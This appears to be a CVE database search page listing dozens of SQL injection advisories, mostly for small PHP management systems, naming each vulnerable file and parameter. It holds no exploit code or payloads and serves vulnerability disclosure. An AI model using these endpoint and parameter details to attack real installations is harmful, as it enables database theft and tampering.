Search
Total
8599 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-0475 | 2024-01-13 | N/A | N/A | ||
| A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580. | |||||
| CVE-2024-0474 | 2024-01-12 | N/A | N/A | ||
| A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579. | |||||
| CVE-2024-0473 | 2024-01-12 | N/A | N/A | ||
| A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0470 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575. | |||||
| CVE-2024-0469 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0471 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576. | |||||
| CVE-2024-0463 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568. | |||||
| CVE-2024-0462 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567. | |||||
| CVE-2024-0464 | 2024-01-12 | N/A | N/A | ||
| A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability. | |||||
| CVE-2024-0466 | 2024-01-12 | N/A | N/A | ||
| A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571. | |||||
| CVE-2023-39336 | 1 Ivanti | 1 Endpoint Manager | 2024-01-12 | N/A | 8.8 HIGH |
| An unspecified SQL Injection vulnerability in Ivanti Endpoint Manager released prior to 2022 SU 5 allows an attacker with access to the internal network to execute arbitrary SQL queries and retrieve output without the need for authentication. Under specific circumstances, this may also lead to RCE on the core server. | |||||
| CVE-2024-0461 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-52142 | 1 Coolplugins | 1 Events Shortcodes For The Events Calendar | 2024-01-12 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cool Plugins Events Shortcodes For The Events Calendar.This issue affects Events Shortcodes For The Events Calendar: from n/a through 2.3.1. | |||||
| CVE-2024-0459 | 2024-01-12 | N/A | N/A | ||
| A vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564. | |||||
| CVE-2024-0460 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability. | |||||
| CVE-2024-0355 | 1 Phpgurukul | 1 Dairy Farm Shop Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0359 | 1 Code-projects | 1 Simple Online Hotel Reservation System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0361 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128. | |||||
| CVE-2024-0362 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability. | |||||
| CVE-2024-0360 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127. | |||||
| CVE-2024-0363 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability. | |||||
| CVE-2024-0364 | 1 Phpgurukul | 1 Hospital Management System | 2024-01-12 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131. | |||||
| CVE-2024-22196 | 2024-01-12 | N/A | N/A | ||
| Nginx-UI is an online statistics for Server Indicators?? Monitor CPU usage, memory usage, load average, and disk usage in real-time. This issue may lead to information disclosure. By using `DefaultQuery`, the `"desc"` and `"id"` values are used as default values if the query parameters are not set. Thus, the `order` and `sort_by` query parameter are user-controlled and are being appended to the `order` variable without any sanitization. This issue has been patched in version 2.0.0.beta.9. | |||||
| CVE-2022-4961 | 2024-01-12 | N/A | N/A | ||
| A vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243. | |||||
| CVE-2024-0426 | 2024-01-12 | N/A | N/A | ||
| A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability. | |||||
| CVE-2023-26440 | 1 Open-xchange | 1 Open-xchange Appsuite Office | 2024-01-12 | N/A | 7.8 HIGH |
| The cacheservice API could be abused to indirectly inject parameters with SQL syntax which was insufficiently sanitized and would later be executed when creating new cache groups. Attackers with access to a local or restricted network could perform arbitrary SQL queries. We have improved the input check for API calls and filter for potentially malicious content. No publicly available exploits are known. | |||||
| CVE-2023-26443 | 1 Open-xchange | 1 Open-xchange Appsuite Backend | 2024-01-12 | N/A | 9.8 CRITICAL |
| Full-text autocomplete search allows user-provided SQL syntax to be injected to SQL statements. With existing sanitization in place, this can be abused to trigger benign SQL Exceptions but could potentially be escalated to a malicious SQL injection vulnerability. We now properly encode single quotes for SQL FULLTEXT queries. No publicly available exploits are known. | |||||
| CVE-2023-26454 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to fetch image metadata could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the services database user account. API requests are now properly checked for valid content and attempts to circumvent this check are being logged as error. No publicly available exploits are known. | |||||
| CVE-2023-26439 | 1 Open-xchange | 1 Open-xchange Appsuite Office | 2024-01-12 | N/A | 7.8 HIGH |
| The cacheservice API could be abused to inject parameters with SQL syntax which was insufficiently sanitized before getting executed as SQL statement. Attackers with access to a local or restricted network were able to perform arbitrary SQL queries, discovering other users cached data. We have improved the input check for API calls and filter for potentially malicious content. No publicly available exploits are known. | |||||
| CVE-2023-26452 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to cache an image and return its metadata could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the services database user account. API requests are now properly checked for valid content and attempts to circumvent this check are being logged as error. No publicly available exploits are known. | |||||
| CVE-2023-29047 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 7.3 HIGH |
| Imageconverter API endpoints provided methods that were not sufficiently validating and sanitizing client input, allowing to inject arbitrary SQL statements. An attacker with access to the adjacent network and potentially API credentials, could read and modify database content which is accessible to the imageconverter SQL user account. None No publicly available exploits are known. | |||||
| CVE-2023-26453 | 1 Open-xchange | 1 Open-xchange Appsuite | 2024-01-12 | N/A | 8.8 HIGH |
| Requests to cache an image could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the services database user account. API requests are now properly checked for valid content and attempts to circumvent this check are being logged as error. No publicly available exploits are known. | |||||
| CVE-2024-0306 | 1 Lopalopa | 1 Dynamic Lab Management System | 2024-01-11 | N/A | 7.5 HIGH |
| A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability. | |||||
| CVE-2024-0307 | 1 Lopalopa | 1 Dynamic Lab Management System | 2024-01-11 | N/A | 7.5 HIGH |
| A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-6921 | 1 Prestashow | 1 Google Integrator | 2024-01-11 | N/A | 9.1 CRITICAL |
| Blind SQL Injection vulnerability in PrestaShow Google Integrator (PrestaShop addon) allows for data extraction and modification. This attack is possible via command insertion in one of the cookies. | |||||
| CVE-2023-52201 | 1 Briandgoad | 1 Ptypeconverter | 2024-01-11 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Brian D. Goad pTypeConverter.This issue affects pTypeConverter: from n/a through 0.2.8.1. | |||||
| CVE-2023-50162 | 1 Phome | 1 Empirecms | 2024-01-11 | N/A | 7.2 HIGH |
| SQL injection vulnerability in EmpireCMS v7.5, allows remote attackers to execute arbitrary code and obtain sensitive information via the DoExecSql function. | |||||
| CVE-2023-52204 | 1 Javik | 1 Randomize | 2024-01-11 | N/A | 8.8 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Javik Randomize.This issue affects Randomize: from n/a through 1.4.3. | |||||
| CVE-2024-0301 | 1 Fhs-opensource | 1 Iparking | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868. | |||||
| CVE-2024-21747 | 1 Wedevs | 1 Wp Erp | 2024-01-11 | N/A | 4.9 MEDIUM |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting.This issue affects WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting: from n/a through 1.12.8. | |||||
| CVE-2023-52215 | 1 Ukrsolution | 1 Simple Inventory Management | 2024-01-11 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in UkrSolution Simple Inventory Management – just scan barcode to manage products and orders. For WooCommerce.This issue affects Simple Inventory Management – just scan barcode to manage products and orders. For WooCommerce: from n/a through 1.5.1. | |||||
| CVE-2023-46953 | 1 Abocms | 1 Abo.cms | 2024-01-11 | N/A | 9.8 CRITICAL |
| SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module. | |||||
| CVE-2024-0267 | 1 Surajghosh | 1 Hospital Management System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823. | |||||
| CVE-2024-0268 | 1 Surajghosh | 1 Hospital Management System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824. | |||||
| CVE-2024-0247 | 1 Online Food Ordering System Project | 1 Online Food Ordering System | 2024-01-11 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-39853 | 1 Dzzoffice | 1 Dzzoffice | 2024-01-11 | N/A | 6.5 MEDIUM |
| SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module. | |||||
| CVE-2023-50027 | 1 Buy-addons | 1 Bazoom Magnifier | 2024-01-11 | N/A | 9.8 CRITICAL |
| SQL Injection vulnerability in Buy Addons baproductzoommagnifier module for PrestaShop versions 1.0.16 and before, allows remote attackers to escalate privileges and gain sensitive information via BaproductzoommagnifierZoomModuleFrontController::run() method. | |||||
| CVE-2022-2718 | 1 Beardev | 1 Joomsport | 2024-01-11 | N/A | 4.9 MEDIUM |
| The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter on the joomsport-page-extrafields page in versions up to, and including, 5.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrative privileges, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | |||||
| CVE-2022-2717 | 1 Beardev | 1 Joomsport | 2024-01-11 | N/A | 4.9 MEDIUM |
| The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter on the joomsport-events-form page in versions up to, and including, 5.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrative privileges, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | |||||
| CVE-2024-0389 | 2024-01-10 | N/A | N/A | ||
| A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability. | |||||